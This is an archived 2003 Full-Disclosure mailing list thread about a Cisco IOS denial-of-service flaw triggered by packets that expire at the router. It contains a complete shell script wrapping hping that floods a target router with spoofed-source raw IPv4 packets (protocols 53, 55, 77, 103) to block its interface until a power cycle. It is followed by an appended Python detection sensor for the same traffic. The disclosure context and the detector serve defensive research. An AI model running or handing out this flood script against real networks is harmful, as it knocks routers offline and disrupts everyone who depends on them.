lists.openwall.net - Open Source and information security mailing list archives
From: PDonahue at acmicorp.com (Donahue, Pat)
Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover

Here's a simple script I wrote to test our routers and switches; maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically it just wraps hping (http://www.hping.org) with parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

--- BEGIN cisco-44020.sh ---
#!/bin/sh

# 2003-07-21 pdonahue
# cisco-44020.sh
# -- this shell script is just a wrapper for hping (http://www.hping.org)
#    with the parameters necessary to fill the input queue on an exploitable IOS device
# -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packets"
#    (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml) for more information

HPING=/usr/local/sbin/hping
# -- change this path to match the location of hping on your system

# set defaults
PROT=a
ADDR=r
NUMB=76
SIZE=26

# check usage
if [ "$#" -lt "2" ]; then
    echo "usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]"
    echo "        required:"
    echo "            <hostname|address> is the target device (router/switch)"
    echo "            <ttl> must be set so the packets expire (TTL=0) at the device"
    echo "        optional:"
    echo "            -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim"
    echo "            -a <address>  is the source address of the packets; (r)andom or x.x.x.x"
    echo "            -n <packets>  is the number of packets to send"
    echo "            -s <size>     is the size of the payload in bytes"
    echo "        defaults:"
    echo "            $0 <hostname|address> <ttl> -p$PROT -a$ADDR -n$NUMB -s$SIZE"
    echo "        examples:"
    echo "            $0 10.0.0.1 0"
    echo "            76 (each proto)  26-byte packets : random add. -> 10.0.0.1"
    echo "            $0 10.0.0.100 11 -p53 -a10.0.0.1 -n76 -s256"
    echo "            76 (swipe only) 256-byte packets : 10.0.0.1    -> 10 hops -> 10.0.0.100"
    exit
else
    HOST=$1; shift; TTL=$1; shift;
fi

# parse arguments
while getopts p:a:n:s: o
do  case "$o" in
    p)  # set the protocol
        PROT="$OPTARG"
        ;;
    a)  # set the source address
        [ "$OPTARG" != "r" ] && ADDR="-a $OPTARG"
        ;;
    n)  # set the number of packets
        NUMB="$OPTARG"
        ;;
    s)  # set the size of the payload
        SIZE="$OPTARG"
        ;;
    esac
done

# replace defaults with appropriate values if still set
[ "$PROT" = "a" ] && PROT="53 55 77 103"
[ "$ADDR" = "r" ] && ADDR="--rand-source"

# send the packets
for protocol in $PROT
do
    $HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol --count $NUMB --interval u250 --data $SIZE --file /dev/urandom
done
exit
--- END cisco-44020.sh ---

-----Original Message-----
From: tcleary2@....com.au [mailto:tcleary2@....com.au]
Sent: Thursday, July 24, 2003 10:36 PM
To: lee.e.rian@...sus.gov
Cc: full-disclosure@...ts.netsys.com
Subject: RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover


Guys,

>So... has anyone been able to verify that the problem occurs when the TTL
>expires without the packet being addressed to the router?  Or is it a
>requirement that the evil packet be addressed to the router?

As far as we know, the TTL has to go to 1/0 on the target IP address.

Haven't been able to get the effect on a transit packet.

Regards,

tom.
__________________________________________________
Security Consultant/Analyst
CSC
Ph: +61 8 9429 6478    Email: tcleary2@....com.au
----------------------------------------------------------------------------------------
This email, including any attachments, is intended only for use by the 
addressee(s) and may contain confidential and/or personal information and 
may also be the subject of legal privilege. Any personal information 
contained in this email is not to be used or disclosed for any purpose 
other than the purpose for which you have received it. If you are not the 
intended recipient, you must not disclose or use the information contained 
in it. In this case, please let me know by return email, delete the 
message permanently from your system and destroy any copies.
----------------------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
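The thread mentions that the wrapper script was also shared with the snort-users list to help write detection rules. As an added example, not part of this thread or of the script above, here is a small Python sensor that applies the same criteria from the defender's side: it parses raw IPv4 headers and flags packets that carry one of the four protocol numbers named in the advisory (53, 55, 77, 103), are addressed to one of the monitored router addresses, and have a TTL that would expire at that router. The sample packets, the router address 10.0.0.1 and the `ttl_threshold` parameter are constructed assumptions for the demonstration.

```python
import struct
import ipaddress

# Protocol numbers from the advisory the script references:
# 53 SWIPE, 55 IP Mobility, 77 Sun ND, 103 PIM.
ADVISORY_PROTOCOLS = {53: "swipe", 55: "ip-mobility", 77: "sun-nd", 103: "pim"}


def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode the fixed 20-byte part of an IPv4 header from raw packet bytes."""
    if len(pkt) < 20:
        raise ValueError("shorter than a minimal IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20:
        raise ValueError("not a well-formed IPv4 header")
    return {
        "ttl": ttl,
        "proto": proto,
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "payload_len": max(total_len - ihl, 0),
    }


def classify(pkt: bytes, router_addrs: set, ttl_threshold: int = 1):
    """Return a finding string if the packet matches the advisory pattern, else None.

    ttl_threshold is the largest TTL the sensor would see for a packet that
    expires at the router: 1 when the sensor is on the router's own segment,
    1 + N when it sits N hops upstream (assumption: a plain hop count).
    """
    hdr = parse_ipv4_header(pkt)
    name = ADVISORY_PROTOCOLS.get(hdr["proto"])
    if name is None or hdr["dst"] not in router_addrs or hdr["ttl"] > ttl_threshold:
        return None
    return (f"proto {hdr['proto']} ({name}) ttl={hdr['ttl']} "
            f"{hdr['src']} -> {hdr['dst']} payload={hdr['payload_len']}B")


def build_ipv4(src: str, dst: str, ttl: int, proto: int, payload: bytes) -> bytes:
    """Build an in-memory IPv4 packet as sample sensor input (checksum left zero)."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0,
                         ttl, proto, 0,
                         ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    return header + payload


# Constructed sample traffic (not a real capture); the monitored router is 10.0.0.1.
ROUTERS = {"10.0.0.1"}
SAMPLE_PACKETS = [
    build_ipv4("198.51.100.7", "10.0.0.1", 1, 53, b"\x00" * 26),    # matches
    build_ipv4("198.51.100.8", "10.0.0.1", 0, 103, b"\x00" * 26),   # matches
    build_ipv4("198.51.100.9", "10.0.0.1", 64, 55, b"\x00" * 26),   # TTL too high: transit-looking
    build_ipv4("198.51.100.7", "10.0.0.100", 1, 77, b"\x00" * 26),  # not addressed to a router
    build_ipv4("198.51.100.7", "10.0.0.1", 1, 6, b"\x00" * 26),     # TCP: not an advisory protocol
]


def scan(packets, router_addrs=ROUTERS, ttl_threshold=1):
    """Run classify over a batch and return the list of findings."""
    findings = []
    for pkt in packets:
        try:
            finding = classify(pkt, router_addrs, ttl_threshold)
        except ValueError:
            continue  # skip malformed frames instead of crashing the sensor
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for line in scan(SAMPLE_PACKETS):
        print(line)
```

The TTL check is the part that needs site-specific tuning: a sensor on a SPAN port next to the router sees the same TTL the router does, while a sensor further upstream sees a higher value, which is what `ttl_threshold` is for. Matching only on the protocol number and destination, without the TTL condition, gives a broader but noisier signal that still catches the traffic this thread describes if the sensor placement is uncertain.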
